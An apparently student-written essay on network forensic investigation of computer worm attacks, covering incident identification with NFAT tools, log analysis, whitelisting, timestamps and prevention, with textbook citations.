Worms are self-replicating malware that attack a computer network system. When worms infest a computer network system, they exploit system vulnerabilities and flaws to spread to other points. Worms can bring about enormous damages when they infest a network system. They have the ability to install botnets, launch DOOS attacks, access highly classified and sensitive information, delete files, and corrupt vital system files. Unlike viruses and Trojan horses, worms do not depend on human intervention to spread through a network system, they self-replicate and spread through attacking and damaging system units. Worms have a history of destroying great number of computers in the world. In 1988, Morris worm infected over 5000 computer systems, which represented about 10% of the all computers connected to the internet (Davidoff & Ham, 2012). Having updated systems security protocols and data security policies are important if one wants to mitigate worm attacks and avoid costs associated with them.
The first step of conducting a forensic investigation to determine a worm attack on a network port or an email server on a system is identification; one needs to the NFAT forensic component to identify the form and nature of the attack. Worms have myriad ways of penetrating a computer system(Davidoff & Ham, 2012) . This could be through emails, and unsecured downloads among others. Identification aims at gathering events, analyzing them, and determining the occurrence of an event. Identification is indeed the act of establishing the occurrence of an incident. This helps to give incident handlers information to determination when a worm attacked a network system. Normally, discovery of an incident emanates from user complaints, N-IDS alerts, or manual analysis and examination of web and email logs(Davidoff & Ham, 2012) . Knowing the kind of attack, human v worm facilitated is crucial when preparing to respond and deal with problem. Worm facilitated attack will explore vulnerable points on a network system and gain entry through them. On the other hand, human facilitated worm attacks always conduct reconnaissance activities before entering the system, and will have different logged records from that of worms.
Other than the NFAT forensic component, one could employ different methods to identify the occurrence of an incident involving worm attacks. The first method is getting latest information about the evolution of worms. This is possible through getting in touch with security communities around who give periodic updates on evolution and the changing nature of worms. This would help the organization understand the latest threats (Joshi & Pilli, 2016). Signing up with OS vendors, SANS stormcenter, and Bugtraq security email notification could help understanding the attack (Conti, 2007). Secondly, the organization also needs to understand system applications and the nature of logged data. As indicated, human assisted worm attack have differently looking logged data from those depicted worms attack by themselves. Using NFAT forensic component to examine the logged data will therefore be an important activity to identify the type and nature of the attack. Examination of logged data will also help reveal typical and malicious visitor behavior and show details about increased activity (Joshi & Pilli, 2016).
To understand malicious and legitimate activities on the network system, one should use web analytic tools and ad-hoc queries. The investigators involved and the software security organ in charge of the investigation should understand the different web codes such as 200, 300, and 500 among others because they could help reveal important details about the attack at hand(Conti, 2007) . Techniques such as white listing using NFAT tools for custom search strings are tremendously useful in the event that the investigator has a problem with differentiating between non-anomalous log entries and unknown potential threats or even known threats. For successful creation of white listing, one should remove static html pages, cascading style sheets, .gifs, and æÆnoiseÆ files. This makes the search time reasonable enough for the investigative team to understand the nature and impact of the attack.
Time stamps are useful tools of backtracking incidents in a forensic investigation of the nature described in the exercise. In this case, the organization and the investigators in charge of the project will use the NFAT forensic component or tool to extract the imaging of the incident attack. This will provide an ample space to examine and analyze the extracted system log imaging (Conti, 2007) . The investigators and project team leaders will focus on examination of internet and email history logs to help understand the entry period of the malicious worm. The team will examine the logs and proceed with creating a report to explain what they detect as malicious and when it first appeared on the network. The report created by the investigative team is important for various reasons (Conti, 2007). Foremost, it will reveal the exact time when the worm infested or gained entry into the system. Secondly, it will also explain the various resources that suffered the attack. Lastly, the report is critical because it will show the aftermath state of the network after the attack. All this information is critical; it can help the organization seek remedies for the damages caused by the attack.
It is important that the organization prevented such occurrences in time. Software needs to be up to date because worms are continuously being created to bypass existing software security protocols by exploring their vulnerabilities. The organization should also invest in its system network security by accessing latest information about cybersecurity by linking with security agencies. This is helpful because it gives the organization ample skills to deal with threats and knowledge of new development in cybersecurity.
- Conti, G. (2007). Security data visualization: Graphical techniques for network analysis. San Francisco: No Starch Press.
- Davidoff, S., & Ham, J. (2012). Network forensics: Tracking hackers through cyberspace. Upper Saddle River (N.J.: Prentice Hall.
- Joshi, R. C., & Pilli, E. S. (2016). Fundamentals of network forensics: A research perspective.